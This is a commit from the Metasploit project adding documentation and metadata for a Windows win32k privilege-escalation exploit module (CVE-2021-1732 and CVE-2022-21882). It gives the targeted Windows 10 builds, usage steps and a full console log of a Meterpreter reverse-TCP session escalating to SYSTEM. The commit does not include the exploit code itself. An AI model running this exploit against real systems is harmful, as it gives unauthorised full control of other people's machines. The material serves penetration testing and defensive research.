Writeup the module metadata and docs
This commit is contained in:
parent
d92259f868
commit
bcd7cb1122
|
@ -0,0 +1,86 @@
|
|||
## Vulnerable Application
|
||||
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
|
||||
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
|
||||
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
|
||||
achieve an out of bounds write operation, eventually leading to privilege escalation.
|
||||
|
||||
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
|
||||
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
|
||||
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
|
||||
function on a wider range of Windows 10 targets.
|
||||
|
||||
Windows 10 builds 17134 (v1803) through 19041 (v20H1) will use the original technique from CVE-2021-1732, leveraging
|
||||
`user32!CreateWindowEx` to trigger the `xxxClientAllocWindowClassExtraBytes` hook and corrupt the target window. Windows
|
||||
10 builds 19042 (v20H2) through 19044 (v21H2) will use the updated technique from CVE-2022-21882, leveraging
|
||||
`win32u!NtUserMessageCall` to trigger the `xxxClientAllocWindowClassExtraBytes` hook for the same effect.
|
||||
|
||||
### Installation And Setup
|
||||
Windows 10 versions 1803 through 21H2 (without the patch) are vulnerable out of the box. This exploit module has been
|
||||
tested on Windows 10 versions 1803, 1909, 20H1, 20H2 and 21H2.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Get a Meterpreter session on a vulnerable host
|
||||
1. Do: `use exploit/windows/local/cve_2022_21882_win32k`
|
||||
1. Set the `SESSION` and `PAYLOAD` options
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10 Version 21H2 Build 19044.1288 x64
|
||||
|
||||
```
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > sessions -i -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: DESKTOP-SRAQBLH\smcintyre
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-SRAQBLH
|
||||
OS : Windows 10 (10.0 Build 19044).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getsystem
|
||||
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
|
||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (Dropper/Admin)
|
||||
[-] Token Duplication (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (RPCSS variant)
|
||||
[-] Named Pipe Impersonation (PrintSpooler variant)
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > set LHOST 192.168.159.128
|
||||
LHOST => 192.168.159.128
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Launching netsh to host the DLL...
|
||||
[+] Process 6840 launched.
|
||||
[*] Reflectively injecting the DLL into 6840...
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
[*] Sending stage (200262 bytes) to 192.168.159.87
|
||||
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.87:52622 ) at 2022-02-18 14:34:00 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-SRAQBLH
|
||||
OS : Windows 10 (10.0 Build 19044).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -12,18 +12,39 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
include Msf::Exploit::Deprecated
|
||||
moved_from 'exploit/windows/local/cve_2021_1732_win32k'
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
{
|
||||
'Name' => '',
|
||||
'Name' => 'Win32k ConsoleControl Offset Confusion',
|
||||
'Description' => %q{
|
||||
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
|
||||
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
|
||||
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
|
||||
achieve an out of bounds write operation, eventually leading to privilege escalation.
|
||||
|
||||
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
|
||||
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
|
||||
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
|
||||
function on a wider range of Windows 10 targets.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
# CVE-2021-1732
|
||||
'BITTER APT', # exploit as used in the wild
|
||||
'JinQuan', # detailed analysis
|
||||
'MaDongZe', # detailed analysis
|
||||
'TuXiaoYi', # detailed analysis
|
||||
'LiHao', # detailed analysis
|
||||
# CVE-2022-21882
|
||||
'L4ys', # github poc
|
||||
'KaLendsi', # github poc
|
||||
# both CVEs
|
||||
'KaLendsi', # github pocs
|
||||
# Metasploit exploit
|
||||
'Spencer McIntyre' # metasploit module
|
||||
],
|
||||
'Arch' => [ ARCH_X64 ],
|
||||
|
@ -33,26 +54,34 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Targets' => [
|
||||
[ 'Windows 10 v20H2-21H2 x64', { 'Arch' => ARCH_X64 } ]
|
||||
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'Payload' => {
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' => [
|
||||
# CVE-2021-1732 references
|
||||
[ 'CVE', '2021-1732' ],
|
||||
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
|
||||
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
|
||||
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
|
||||
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
|
||||
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
|
||||
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
|
||||
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
|
||||
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
|
||||
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
|
||||
# CVE-2022-21882 references
|
||||
[ 'CVE', '2022-21882' ],
|
||||
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
|
||||
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
|
||||
'DefaultTarget' => 0,
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_OS_RESTARTS, ],
|
||||
'Reliability' => [ REPEATABLE_SESSION, ],
|
||||
'SideEffects' => [],
|
||||
'RelatedModules' => [
|
||||
# this module exploits the original vulnerability for which this is a patch bypass
|
||||
'exploit/windows/local/cve_2021_1732_win32k'
|
||||
]
|
||||
'SideEffects' => []
|
||||
}
|
||||
}
|
||||
)
|
||||
|
|
Loading…
Reference in New Issue